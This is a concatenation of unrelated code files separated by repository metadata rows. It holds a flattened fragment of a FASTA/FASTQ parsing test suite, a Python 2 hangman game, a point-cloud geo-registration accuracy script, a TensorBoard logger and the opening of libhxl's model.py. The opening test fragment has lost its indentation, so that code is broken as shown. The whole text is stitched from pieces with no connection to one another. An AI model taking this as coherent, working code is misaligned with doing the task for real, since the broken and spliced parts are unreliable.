result = open(out_fhand.name).read()
assert '>NM_019354.2' in result
class ReadWriteSeqRecordsTest(unittest.TestCase):
'It writes seqrecords in a file'
    def test_write_empty_seq(self):
'It does not write an empty sequence'
seq1 = SeqRecord(Seq('ACTG'), id='seq1')
fhand = StringIO()
_write_seqrecords([seq1, None, SeqRecord(Seq(''), id='seq2')], fhand,
file_format='fasta')
fhand.flush()
assert fhand.getvalue() == '>seq1\nACTG\n'
def test_read_fasta(self):
'It tests the reading of a fasta file'
fhand = StringIO('>seq1\nACTG\n')
assert not list(_read_seqrecords([fhand]))[0].description
class SimpleIOTest(unittest.TestCase):
'It tests the simple input and output read'
def test_singleline_itemizer(self):
fhand = StringIO('@s1\nACTG\n+\n1234\n' * 1100)
seqs = list(_itemize_fastx(fhand))
names = [seq[0] for seq in seqs]
assert len(names) == 1100
assert len(set([seq[1][1] for seq in seqs])) == 1
def test_fasta_itemizer(self):
'It tests the fasta itemizer'
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTG\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
# with several lines
fhand = StringIO('>s1\nACTG\nGTAC\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTGGTAC\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
# With empty lines
fhand = StringIO('>s1\nACTG\n\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTG\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
def test_fastq_itemizer(self):
        'It tests the fastq itemizer'
fhand = StringIO('@s1\nACTG\n+\n1234\n@s2 desc\nACTG\n+\n4321\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTG\n', '+\n', '1234\n'], {}),
('s2', ['@s2 desc\n', 'ACTG\n', '+\n', '4321\n'], {})]
# Empty line
fhand = StringIO('@s1\nACTG\n+\n1234\n\n@s2 desc\nACTG\n+\n4321\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTG\n', '+\n', '1234\n'], {}),
('s2', ['@s2 desc\n', 'ACTG\n', '+\n', '4321\n'], {})]
        # Multi-line sequence and quality
fhand = StringIO('@s1\nACTG\nATTA\n+\n1234\n1234\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTGATTA\n', '+\n', '12341234\n'],
{})]
def test_seqitems_io(self):
'It checks the different seq class streams IO'
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], prefered_seq_classes=[SEQITEM]))
assert seqs[0].kind == SEQITEM
fhand = StringIO()
write_seqs(seqs, fhand)
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
assert seqs[0].object.name == 's1'
# SeqRecord
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], prefered_seq_classes=[SEQRECORD]))
assert seqs[0].kind == SEQRECORD
fhand = StringIO()
write_seqs(seqs, fhand, 'fasta')
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
# seqitem not possible with different input and output formats
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
try:
seqs = list(read_seqs([fhand], out_format='fastq',
prefered_seq_classes=[SEQITEM]))
self.fail('ValueError expected')
except ValueError:
pass
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], out_format='fasta',
prefered_seq_classes=[SEQITEM]))
fhand = StringIO()
write_seqs(seqs, fhand)
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
class PipingTest(unittest.TestCase):
'It tests that we get no error when trying to write in a closed pipe'
def test_write_closed_pipe(self):
seq_fhand = NamedTemporaryFile(suffix='.fasta')
n_seqs = 1000
for i in range(n_seqs):
seq_fhand.write('>s\nACTG\n')
seq_fhand.flush()
in_fpath = seq_fhand.name
seq_head = os.path.join(BIN_DIR, 'seq_head')
process_seq = Popen([seq_head, '-n', str(n_seqs), in_fpath],
stdout=PIPE)
stdout = NamedTemporaryFile(suffix='.stdout')
process_head = Popen(['head', '-n', '1'], stdin=process_seq.stdout,
stdout=stdout)
process_seq.stdout.close() # Allow seq_head to receive a SIGPIPE if
# head exits.
process_head.communicate()
assert open(stdout.name).read() == '>s\n'
seq_fhand.close()
stdout.close()
# With SeqRecords
gb_fpath = os.path.join(TEST_DATA_DIR, 'sequence.gb')
gb_content = open(gb_fpath).read()
seq_fhand = NamedTemporaryFile(suffix='.gb')
n_seqs = 100
for i in range(n_seqs):
seq_fhand.write(gb_content)
seq_fhand.flush()
in_fpath = seq_fhand.name
process_seq = Popen([seq_head, '-n', str(n_seqs), in_fpath],
stdout=PIPE)
stdout = NamedTemporaryFile(suffix='.stdout')
process_head = Popen(['head', '-n', '1'], stdin=process_seq.stdout,
stdout=stdout)
process_seq.stdout.close() # Allow seq_head to receive a SIGPIPE if
# head exits.
process_head.communicate()
seq_fhand.close()
assert 'LOCUS' in open(stdout.name).read()
stdout.close()
if __name__ == '__main__':
#import sys;sys.argv = ['', 'SeqIOTest.test_guess_seq_type']
unittest.main()
|
gpl-3.0
| -4,225,053,976,801,928,000
| 38.139623
| 78
| 0.58253
| false
| 3.237203
| true
| false
| false
|
ishanatmuz/HangmanMinimalist
|
hangman.py
|
1
|
4431
|
import random
import string
import os
import platform
# Defining the text file containing the list of words
WORDLIST_FILENAME = "words.txt"
MAX_GUESSES = 8
def loadWords():
# Returns a list of valid words. Words are taken from the file words.txt
print "Loading word list from file..."
# Open file for reading with no buffering
inFile = open(WORDLIST_FILENAME, 'r', 0)
# Read the file in single line
line = inFile.readline()
# Split all the words separated by whitespaces
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
def chooseWord(wordlist):
    # Choose a word at random which the user has to guess
return random.choice(wordlist)
def isWordGuessed(secretWord, lettersGuessed):
# Checking for the non-existence of any character from the secretWord
    # The result is stored as True or False
result = True;
for secretLetter in secretWord:
if not secretLetter in lettersGuessed:
result = False;
break;
return result;
def getGuessedWord(secretWord, lettersGuessed):
# Returns the guessed word in a specific format
    # Example - the word 'apple' with the guessed characters ['a', 'b', 'l', 's', 'e']
    # would look like this: 'a_ _ le'
result = "'";
for letter in secretWord:
if letter in lettersGuessed:
result += letter;
else:
result += '_ ';
result += "'";
return result;
def getAvailableLetters(lettersGuessed):
# Return the list of letters that are available to be used
# The letters returned are in lowercase
availableLetters = string.ascii_lowercase;
for letter in lettersGuessed:
availableLetters = availableLetters.replace(letter, '');
return availableLetters;
def clearTerminal():
# Clears the terminal on which the output is being displayed.
# Works at least on Windows and Linux, I haven't tested it on Mac OS
if platform.system() == 'Windows':
os.system('cls')
else:
os.system('clear')
def hangman(secretWord):
# Total number of wrong guesses allowed is 8
numberOfGuesses = MAX_GUESSES
# The letters guessed by the user
lettersGuessed = {}
# Welcome message
print 'Welcome to the game, Hangman!'
print 'I am thinking of a word that is %s letters long.' %(str(len(secretWord)))
# Infinite loop which breaks from inside the loop's conditions
while True:
print '-------------'
if not isWordGuessed(secretWord, lettersGuessed):
# Word not guessed
if numberOfGuesses == 0:
# All guesses exhausted, end the game
print 'Sorry, you ran out of guesses. The word was %s.' %(secretWord)
break
else:
# Guesses left, Display guesses left and available letters
print 'You have %s guesses left.' %(str(numberOfGuesses))
print 'Available letters: %s' %(getAvailableLetters(lettersGuessed))
# Take input from the user
guessedLetter = raw_input('Please guess a letter: ')
# Clearing the terminal
# Can use and cannot use depending on the preference
clearTerminal()
if guessedLetter in lettersGuessed:
# Already guessed letter, display guessed word
print 'Oops! You\'ve already guessed that letter:%s' %(getGuessedWord(secretWord, lettersGuessed))
else:
# New guess, add to lettersGuessed
lettersGuessed[guessedLetter] = True
if guessedLetter not in secretWord:
# Wrong Guess, decrement number of guesses
print 'Oops! That letter is not in my word:%s' %(getGuessedWord(secretWord, lettersGuessed))
numberOfGuesses -= 1
else:
# Correct guess
print 'Good guess:%s' %(getGuessedWord(secretWord, lettersGuessed))
else:
# Word guessed
print 'Congratulations, you won!'
break
# Execution sequence of the game
# Load the words from file
wordlist = loadWords()
# Choose a secret word for the user to guess
secretWord = chooseWord(wordlist).lower()
# Start the game for user
hangman(secretWord)
|
mit
| 7,097,529,540,876,522,000
| 36.880342
| 118
| 0.61995
| false
| 4.314508
| false
| false
| false
|
mirestrepo/voxels-at-lems
|
registration_eval/results/compute_trans_geo_accuracy.py
|
1
|
13935
|
#!/usr/bin/env python
# encoding: utf-8
"""
compute_trans_geo_accuracy.py
Created by Maria Isabel Restrepo on 2012-09-24.
Copyright (c) 2012 . All rights reserved.
This script computes the distances between an estimated similarity transformation and its ground truth.
The transformation is used to transform a "source" coordinate system into a "target" coordinate system.
To compute the translation error, the L2 norm of the difference between the translation vectors in the
"source" coordinate system is computed. Since distances are preserved under R and T, only scale is applied.
The rotation error is computed as the half angle between the normalized quaternions, i.e. acos(|<q1,q2>|) in [0, pi/2].
"""
import os
import sys
import logging
import argparse
import vpcl_adaptor as vpcl
import numpy as np
from numpy import linalg as LA
import transformations as tf
import math
import matplotlib.pyplot as plt
sys.path.append(os.pardir)
import reg3d_transformations as reg3d_T
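# Illustrative helper (an addition, not used by the rest of this script): a
# direct implementation of the rotation error described in the module
# docstring, acos(|<q1, q2>|) between normalised quaternions, which lies in
# [0, pi/2]. The quaternion convention is assumed to match the docstring.
def _rotation_error_half_angle(q1, q2):
    q1 = np.asarray(q1, dtype=float)
    q2 = np.asarray(q2, dtype=float)
    q1 = q1 / LA.norm(q1)
    q2 = q2 / LA.norm(q2)
    # clamp the dot product to 1.0 to guard against numerical overshoot
    return math.acos(min(1.0, abs(np.dot(q1, q2))))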
LOG = None
"""Compute the accuracy between the LIDAR fiducial points
and corresponding geo-register correspondances"""
def compute_ref_accuracy(fid_path, original_corrs_path,
geo_tform):
#Load fiducial .ply
fid = open(fid_path, 'r')
fid_points = np.genfromtxt(fid, dtype=float, delimiter=' ',
skip_header=9)
fid.close()
#Load original corrs .ply
fid = open(original_corrs_path, 'r')
original_corrs = np.genfromtxt(fid, dtype=float,
delimiter=' ', skip_header=9)
fid.close()
#Load transformation
#************GEO**************"
Tfis = open(geo_tform, 'r')
lines = []
lines = Tfis.readlines()
scale_geo = float(lines[0])
Ss_geo = tf.scale_matrix(scale_geo)
quat_line = lines[1].split(" ")
quat_geo = np.array([float(quat_line[3]), float(quat_line[0]),
float(quat_line[1]), float(quat_line[2])])
Rs_geo = tf.quaternion_matrix(quat_geo)
trans_line = lines[2].split(" ")
trans_geo = np.array([float(trans_line[0]), float(trans_line[1]),
float(trans_line[2])])
Tfis.close()
Hs_geo = Rs_geo.copy()
Hs_geo[:3, 3] = trans_geo[:3]
Hs_geo = Ss_geo.dot(Hs_geo)
LOG.debug("\n******Geo***** \n Scale: \n%s \nR:\n%s \nT:\n%s \nH:\n%s",
Ss_geo, Rs_geo, trans_geo, Hs_geo)
#Compute the "reference error"
    #i.e. fiducial points - geo-registered correspondences
npoints, c = fid_points.shape
if npoints != 30:
LOG.warn("Number of fiducial point is NOT 30")
if c != 3:
LOG.error("Fiducial points has the wrong number of dimensions")
# import code; code.interact(local=locals())
fid_points_hom = np.hstack((fid_points, np.ones([npoints, 1]))).T
original_corrs_hom = np.hstack((original_corrs, np.ones([npoints, 1]))).T
geo_corrs_hom = Hs_geo.dot(original_corrs_hom)
geo_ref_diff = geo_corrs_hom - fid_points_hom
# import pdb; pdb.set_trace()
delta_z = np.sqrt(geo_ref_diff[2, :] * geo_ref_diff[2, :])
delta_r = np.sqrt(geo_ref_diff[0, :] * geo_ref_diff[0, :] +
geo_ref_diff[1, :] * geo_ref_diff[1, :])
return delta_z, delta_r
def compute_geo_accuracy(fid_path, original_corrs_path,
geo_tform, trials_root, desc_name,
niter, ntrials, percentile=99):
#Load fiducial .ply
fid = open(fid_path, 'r')
fid_points = np.genfromtxt(fid, delimiter=' ',
skip_header=9)
fid.close()
#Load original corrs .ply
fid = open(original_corrs_path, 'r')
original_corrs = np.genfromtxt(fid, delimiter=' ', skip_header=9)
fid.close()
#load the geo tranformation
GEO = reg3d_T.geo_transformation(geo_tform);
#Compute the "reference error"
    #i.e. fiducial points - geo-registered correspondences
npoints, c = fid_points.shape
if npoints != 30:
LOG.warn("Number of fiducial point is NOT 30")
if c != 3:
LOG.error("Fiducial points has the wrong number of dimensions")
# import code; code.interact(local=locals())
fid_points_hom = np.hstack((fid_points, np.ones([npoints, 1]))).T
original_corrs_hom = np.hstack((original_corrs, np.ones([npoints, 1]))).T
geo_corrs_hom = GEO.transform_points(original_corrs_hom)
geo_ref_diff = geo_corrs_hom - fid_points_hom
# import pdb; pdb.set_trace()
delta_z = (geo_ref_diff[2, :] **2) ** (1./2.)
delta_r = (geo_ref_diff[0, :] **2 + geo_ref_diff[1, :] **2 )** (1./2.)
delta_z_ia = np.zeros([ntrials, npoints])
delta_r_ia = np.zeros([ntrials, npoints])
delta_z_icp = np.zeros([ntrials, npoints])
delta_r_icp = np.zeros([ntrials, npoints])
for trial in range(0, ntrials):
print "********Trial", trial, "**********"
#Load the transformations for this trial
#************Hs**************#
#read source to target "Ground Truth" Transformation
Tfile = trials_root + "/trial_" + str(trial) + "/Hs_inv.txt"
GT_Tform = reg3d_T.gt_transformation(Tfile)
src_features_dir = (trials_root + "/trial_" + str(trial) +
"/" + desc_name)
Tfile_ia = (src_features_dir + "/ia_transformation_" +
str(percentile) + "_" + str(niter) + ".txt")
Tfile_icp = (src_features_dir + "/icp_transformation_" +
str(percentile) + "_" + str(niter) + ".txt")
REG_Tform = reg3d_T.pcl_transformation(Tfile_ia, Tfile_icp)
Hs_ia_error = REG_Tform.Hs_ia.dot(GT_Tform.Hs)
Hs_icp_error = REG_Tform.Hs_icp.dot(GT_Tform.Hs)
# transform the points with the residual transformations
ia_corrs_hom = Hs_ia_error.dot(original_corrs_hom)
icp_corrs_hom = Hs_icp_error.dot(original_corrs_hom)
# geo-register
geo_ia_corrs_hom = GEO.transform_points(ia_corrs_hom)
geo_icp_corrs_hom = GEO.transform_points(icp_corrs_hom)
# distances
geo_ia_ref_diff = geo_ia_corrs_hom - fid_points_hom
geo_icp_ref_diff = geo_icp_corrs_hom - fid_points_hom
delta_z_ia[trial, :] = np.sqrt(geo_ia_ref_diff[2, :] ** 2)
delta_r_ia[trial, :] = np.sqrt(geo_ia_ref_diff[0, :] ** 2 +
geo_ia_ref_diff[1, :] ** 2 )
delta_z_icp[trial, :] = np.sqrt(geo_icp_ref_diff[2, :] ** 2)
delta_r_icp[trial, :] = np.sqrt(geo_icp_ref_diff[0, :] ** 2 +
geo_icp_ref_diff[1, :] ** 2)
# import pdb; pdb.set_trace()
return delta_z, delta_r,\
delta_z_ia, delta_r_ia, \
delta_z_icp, delta_r_icp
def main(logfile=None):
global LOG
LOG = setlogging(logfile)
descriptors = ["FPFH_30", "SHOT_30"]
niter = 500;
ntrials = 10;
plot_errors = True;
if (plot_errors):
colors = ['magenta','green'];
markers = ['o', 's', '*', '+', '^', 'v']
fid_path = "/data/lidar_providence/downtown_offset-1-financial-dan-pts1.ply"
original_corrs_path = "/data/lidar_providence/downtown_offset-1-financial-dan-pts0.ply"
trials_root = "/Users/isa/Experiments/reg3d_eval/downtown_dan";
geo_tform = "/data/lidar_providence/downtown_offset-1-financial-dan-Hs.txt"
for d_idx in range(0, len(descriptors)):
desc_name = descriptors[d_idx]
delta_z, delta_r, \
delta_z_ia, delta_r_ia, \
delta_z_icp, delta_r_icp = compute_geo_accuracy(fid_path,
original_corrs_path,
geo_tform, trials_root, desc_name,
niter, ntrials)
#sort errors for all trials to get the 70 80 90 % errors
delta_z_ia.sort(axis=0)
delta_r_ia.sort(axis=0)
delta_z_icp.sort(axis=0)
delta_r_icp.sort(axis=0)
CE_70_ia = delta_r_ia[int(0.7 * ntrials) - 1, :]
CE_80_ia = delta_r_ia[int(0.8 * ntrials) - 1, :]
CE_90_ia = delta_r_ia[int(0.9 * ntrials) - 1, :]
LE_70_ia = delta_z_ia[int(0.7 * ntrials) - 1, :]
LE_80_ia = delta_z_ia[int(0.8 * ntrials) - 1, :]
LE_90_ia = delta_z_ia[int(0.9 * ntrials) - 1, :]
CE_70_icp = delta_r_icp[int(0.7 * ntrials) - 1, :]
CE_80_icp = delta_r_icp[int(0.8 * ntrials) - 1, :]
CE_90_icp = delta_r_icp[int(0.9 * ntrials) - 1, :]
LE_70_icp = delta_z_icp[int(0.7 * ntrials) - 1, :]
LE_80_icp = delta_z_icp[int(0.8 * ntrials) - 1, :]
LE_90_icp = delta_z_icp[int(0.9 * ntrials) - 1, :]
if (plot_errors):
#Plot CE and LE
fig_ia_CE = plt.figure()
ax_ia_CE = fig_ia_CE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_ia_CE.plot(CE_70_ia, "--s", color="green", label= "CE_70");
ax_ia_CE.plot(CE_80_ia, "--^", color="magenta", label= "CE_80");
ax_ia_CE.plot(CE_90_ia, "--*", color="blue", label= "CE_90");
ax_ia_CE.plot( delta_r, "--o", color="cyan", label= "GT");
ax_ia_CE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_ia_CE.set_ylabel('Error (meters)',fontsize= 20);
ax_ia_CE.legend(loc='best', frameon=False);
# ax_ia_CE.set_title('IA CE')
fname = trials_root + "/GEO_results/IA_CE_" + desc_name + ".pdf"
fig_ia_CE.savefig(fname, transparent=True, pad_inches=5)
fig_ia_LE = plt.figure()
ax_ia_LE = fig_ia_LE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_ia_LE.plot(LE_70_ia, "--s", color="green", label= "LE_70");
ax_ia_LE.plot(LE_80_ia, "--^", color="magenta", label= "LE_80");
ax_ia_LE.plot(LE_90_ia, "--*", color="blue", label= "LE_90");
ax_ia_LE.plot( delta_z, "--o", color="cyan", label= "GT");
ax_ia_LE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_ia_LE.set_ylabel('Error (meters)',fontsize= 20);
ax_ia_LE.legend(loc='best', frameon=False);
# ax_ia_LE.set_title('IA LE')
fname = trials_root + "/GEO_results/IA_LE_" + desc_name + ".pdf"
fig_ia_LE.savefig(fname, transparent=True, pad_inches=5)
fig_icp_CE = plt.figure()
ax_icp_CE = fig_icp_CE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_icp_CE.plot(CE_70_icp, "--s", color="green", label= "CE_70");
ax_icp_CE.plot(CE_80_icp, "--^", color="magenta", label= "CE_80");
ax_icp_CE.plot(CE_90_icp, "--*", color="blue", label= "CE_90");
ax_icp_CE.plot( delta_r, "--o", color="cyan", label= "GT");
ax_icp_CE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_icp_CE.set_ylabel('Error (meters)',fontsize= 20);
ax_icp_CE.legend(loc='best', frameon=False);
# ax_icp_CE.set_title('ICP CE')
fname = trials_root + "/GEO_results/ICP_CE_" + desc_name + ".pdf"
fig_icp_CE.savefig(fname, transparent=True, pad_inches=5)
fig_icp_LE = plt.figure()
ax_icp_LE = fig_icp_LE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_icp_LE.plot(LE_70_icp, "--s", color="green", label= "LE_70");
ax_icp_LE.plot(LE_80_icp, "--^", color="magenta", label= "LE_80");
ax_icp_LE.plot(LE_90_icp, "--*", color="blue", label= "LE_90");
ax_icp_LE.plot( delta_z, "--o", color="cyan", label= "GT");
ax_icp_LE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_icp_LE.set_ylabel('Error (meters)',fontsize= 20);
ax_icp_LE.legend(loc='best', frameon=False);
# ax_icp_LE.set_title('ICP LE')
fname = trials_root + "/GEO_results/ICP_LE_" + desc_name + ".pdf"
fig_icp_LE.savefig(fname, transparent=True, pad_inches=5)
# axT.set_xlim((0,505) );
# axT.set_yticks(np.arange(0.0,250.0,20));
# # axT.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
# # ncol=4, mode="expand", borderaxespad=0.)
#
# figT.savefig("/Users/isa/Experiments/reg3d_eval/downtown_dan/T_error.pdf", transparent=True, pad_inches=5)
# plt.show();
# import pdb; pdb.set_trace()
def setlogging(logfile=None):
level = logging.DEBUG
logger = logging.getLogger(__name__)
logger.setLevel(level)
# create formatter and add it to the handlers
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(level)
ch.setFormatter(formatter)
# add the handlers to logger
logger.addHandler(ch)
# create file handler which logs error messages
if logfile:
print "Logging to file"
fh = logging.FileHandler(logfile)
fh.setLevel(level)
fh.setFormatter(formatter)
logger.addHandler(fh)
#test logging
logger.debug("debug message")
logger.info("info message")
logger.warn("warn message")
logger.error("error message")
logger.critical("critical message")
return logger
if __name__ == '__main__':
# initialize the parser object:
parser = argparse.ArgumentParser(description="Export PLY to PCD file")
# define options here:
parser.add_argument("-v", "--verbose", action='store', type = bool, dest="verbose", default=True, help="Write debug log to log_file")
parser.add_argument("-L", "--log", dest="logfile", help="write debug log to log_file")
    args = parser.parse_args()
# set up logging
if args.verbose:
status = main(args.logfile)
else:
status = main()
sys.exit(status)
|
bsd-2-clause
| 5,998,700,725,163,091,000
| 37.924581
| 150
| 0.568497
| false
| 3.043241
| false
| false
| false
|
denizs/torchUp
|
torchup/logging/logger.py
|
1
|
1865
|
import tensorflow as tf
import numpy as np
import scipy.misc
from tensorboardX.src.summary_pb2 import Summary
from tensorboardX import SummaryWriter
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO
class Logger(object):
def __init__(self, log_dir):
'''
Create a summary writer logging to log_dir
'''
self.writer = tf.summary.FileWriter(log_dir)
self.writerX = SummaryWriter(log_dir=log_dir)
def scalar_summary(self, tag, value, step):
'''
Log scalar value
'''
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
self.writer.add_summary(summary, step)
def add_image(self, tag, img, step):
'''
Log img
'''
        summary = Summary(value=[Summary.Value(tag=tag, image=img)])
self.writerX.add_summary(summary, step)
def histo_summary(self, tag, values, step, bins=1000):
'''
Log a histogram of the tensor of values.
'''
# Create histogram:
counts, bin_edges = np.histogram(values, bins=bins)
# Fill the fields of the histogram proto
hist = tf.HistogramProto()
        hist.min = float(np.min(values))
        hist.max = float(np.max(values))
hist.num = int(np.prod(values.shape))
hist.sum = float(np.sum(values))
hist.sum_squares = float(np.sum(values**2))
# Drop the start of the first bin
bin_edges = bin_edges[1:]
# Add bin edges and counts:
for edge in bin_edges:
hist.bucket_limit.append(edge)
for c in counts:
hist.bucket.append(c)
# Create and write Summary
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
self.writer.add_summary(summary, step)
self.writer.flush()
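# Hedged usage sketch (an addition, not part of the original module): drives the
# Logger above from a toy loop. Assumes a TF1-style tf.summary.FileWriter is
# available (as the constructor already requires) and that './logs_example' is a
# writable directory; all names below are illustrative only.
if __name__ == '__main__':
    example_logger = Logger('./logs_example')
    for step in range(3):
        # log a scalar (e.g. a loss value) and a histogram of random weights
        example_logger.scalar_summary('loss', 1.0 / (step + 1), step)
        example_logger.histo_summary('weights', np.random.randn(1000), step, bins=100)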
|
bsd-2-clause
| -5,471,846,208,124,120,000
| 28.140625
| 83
| 0.604826
| false
| 3.813906
| false
| false
| false
|
HXLStandard/libhxl-python
|
hxl/model.py
|
1
|
48776
|
"""Main data-model classes for the Humanitarian Exchange Language (HXL).
This module defines the basic classes for working with HXL data. Other
modules have classes derived from these (e.g. in
[hxl.filters](filters.html) or [hxl.io](io.html)). The core class is
[Dataset](#hxl.model.Dataset), which defines the operations available
on a HXL dataset, including convenience methods for chaining filters.
Typical usage:
source = hxl.data("https://example.org/data.csv")
# returns a hxl.model.Dataset object
result = source.with_lines("#country+name=Kenya").sort()
# a filtered/sorted view of the data
This code is released into the Public Domain and comes with NO WARRANTY.
"""
import abc, copy, csv, dateutil, hashlib, json, logging, operator, re, six
import hxl
logger = logging.getLogger(__name__)
class TagPattern(object):
"""Pattern for matching a HXL hashtag and attributes
- the pattern "#*" matches any hashtag/attribute combination
- the pattern "#*+foo" matches any hashtag with the foo attribute
- the pattern "#tag" matches #tag with any attributes
- the pattern "#tag+foo" matches #tag with foo among its attributes
- the pattern "#tag-foo" matches #tag with foo *not* among its attributes
- the pattern "#tag+foo-bar" matches #tag with foo but not bar
- the pattern "#tag+foo+bar!" matches #tag with exactly the attributes foo and bar, but *no others*
The normal way to create a tag pattern is using the
[parse()](#hxl.model.TagPattern.parse) method rather than the
constructor:
pattern = hxl.model.TagPattern.parse("#affected+f-children")
Args:
tag: the basic hashtag (without attributes)
include_attributes: a list of attributes that must be present
exclude_attributes: a list of attributes that must not be present
is_absolute: if True, no attributes are allowed except those in _include_attributes_
"""
PATTERN = r'^\s*#?({token}|\*)((?:\s*[+-]{token})*)\s*(!)?\s*$'.format(token=hxl.datatypes.TOKEN_PATTERN)
"""Constant: regular expression to match a HXL tag pattern.
"""
def __init__(self, tag, include_attributes=[], exclude_attributes=[], is_absolute=False):
self.tag = tag
self.include_attributes = set(include_attributes)
"""Set of all attributes that must be present"""
self.exclude_attributes = set(exclude_attributes)
"""Set of all attributes that must not be present"""
self.is_absolute = is_absolute
"""True if this pattern is absolute (no extra attributes allowed)"""
def is_wildcard(self):
return self.tag == '#*'
def match(self, column):
"""Check whether a Column matches this pattern.
@param column: the column to check
@returns: True if the column is a match
"""
if column.tag and (self.is_wildcard() or self.tag == column.tag):
# all include_attributes must be present
if self.include_attributes:
for attribute in self.include_attributes:
if attribute not in column.attributes:
return False
# all exclude_attributes must be absent
if self.exclude_attributes:
for attribute in self.exclude_attributes:
if attribute in column.attributes:
return False
# if absolute, then only specified attributes may be present
if self.is_absolute:
for attribute in column.attributes:
if attribute not in self.include_attributes:
return False
return True
else:
return False
def get_matching_columns(self, columns):
"""Return a list of columns that match the pattern.
@param columns: a list of L{hxl.model.Column} objects
@returns: a list (possibly empty)
"""
result = []
for column in columns:
if self.match(column):
result.append(column)
return result
def find_column_index(self, columns):
"""Get the index of the first matching column.
@param columns: a list of columns to check
@returns: the 0-based index of the first matching column, or None for no match
"""
for i in range(len(columns)):
if self.match(columns[i]):
return i
return None
def find_column(self, columns):
"""Check whether there is a match in a list of columns."""
for column in columns:
if self.match(column):
return column
return None
def __repr__(self):
s = self.tag
if self.include_attributes:
for attribute in self.include_attributes:
s += '+' + attribute
if self.exclude_attributes:
for attribute in self.exclude_attributes:
s += '-' + attribute
return s
__str__ = __repr__
@staticmethod
def parse(s):
"""Parse a single tag-pattern string.
pattern = TagPattern.parse("#affected+f-children")
The [parse_list()](#hxl.model.TagPattern.parse_list) method
will call this method to parse multiple patterns at once.
Args:
s: the tag-pattern string to parse
Returns:
A TagPattern object
"""
if not s:
# edge case: null value
raise hxl.HXLException('Attempt to parse empty tag pattern')
elif isinstance(s, TagPattern):
# edge case: already parsed
return s
result = re.match(TagPattern.PATTERN, s)
if result:
tag = '#' + result.group(1).lower()
include_attributes = set()
exclude_attributes = set()
attribute_specs = re.split(r'\s*([+-])', result.group(2))
for i in range(1, len(attribute_specs), 2):
if attribute_specs[i] == '+':
include_attributes.add(attribute_specs[i + 1].lower())
else:
exclude_attributes.add(attribute_specs[i + 1].lower())
if result.group(3) == '!':
is_absolute = True
if exclude_attributes:
raise ValueError('Exclusions not allowed in absolute patterns')
else:
is_absolute = False
return TagPattern(
tag,
include_attributes=include_attributes,
exclude_attributes=exclude_attributes,
is_absolute=is_absolute
)
else:
raise hxl.HXLException('Malformed tag: ' + s)
@staticmethod
def parse_list(specs):
"""Parse a list of tag-pattern strings.
If _specs_ is a list of already-parsed TagPattern objects, do
nothing. If it's a list of strings, apply
[parse()](#hxl.model.TagPattern.parse) to each one. If it's a
single string with multiple patterns separated by commas,
split the string, then parse the patterns.
patterns = TagPattern.parse_list("#affected+f,#inneed+f")
# or
patterns = TagPattern.parse_list("#affected+f", "#inneed+f")
Args:
specs: the raw input (a list of strings, or a single string with commas separating the patterns)
Returns:
A list of TagPattern objects.
"""
if not specs:
return []
if isinstance(specs, six.string_types):
specs = specs.split(',')
return [TagPattern.parse(spec) for spec in specs]
@staticmethod
def match_list(column, patterns):
"""Test if a column matches any of the patterns in a list.
This is convenient to use together with [parse_list()](hxl.model.TagPattern.parse_list):
patterns = TagPattern.parse_list(["#affected+f", "#inneed+f"])
if TagPattern.match_list(column, patterns):
print("The column matched one of the patterns")
Args:
column: the column to test
patterns: a list of zero or more patterns.
Returns:
True if there is a match
"""
for pattern in patterns:
if pattern.match(column):
return True
return False
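# Hedged usage sketch (an addition, not part of the library API): shows a parsed
# TagPattern matching Column objects. Column is defined later in this module,
# which is safe because the body only runs when the function is called.
def _example_tag_pattern_match():
    pattern = TagPattern.parse("#affected+f-children")
    yes = Column.parse("#affected+f+adults")   # has +f and lacks +children
    no = Column.parse("#affected+children")    # lacks the required +f
    return pattern.match(yes), pattern.match(no)  # (True, False)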
class Dataset(object):
"""Abstract base class for a HXL data source.
Any source of parsed HXL data inherits from this class: that
includes Dataset, HXLReader, and the various filters in the
    hxl.filters package. The contract of a Dataset is that it will
provide a columns property and a next() method to read through the
rows.
The child class must implement the columns() method as a property
and the __iter__() method to make itself iterable.
"""
__metaclass__ = abc.ABCMeta
def __init__(self):
"""Constructor."""
super().__init__()
@abc.abstractmethod
def __iter__(self):
"""Get the iterator over the rows.
@returns: an iterator that returns L{hxl.model.Row} objects
"""
raise RuntimeException("child class must implement __iter__() method")
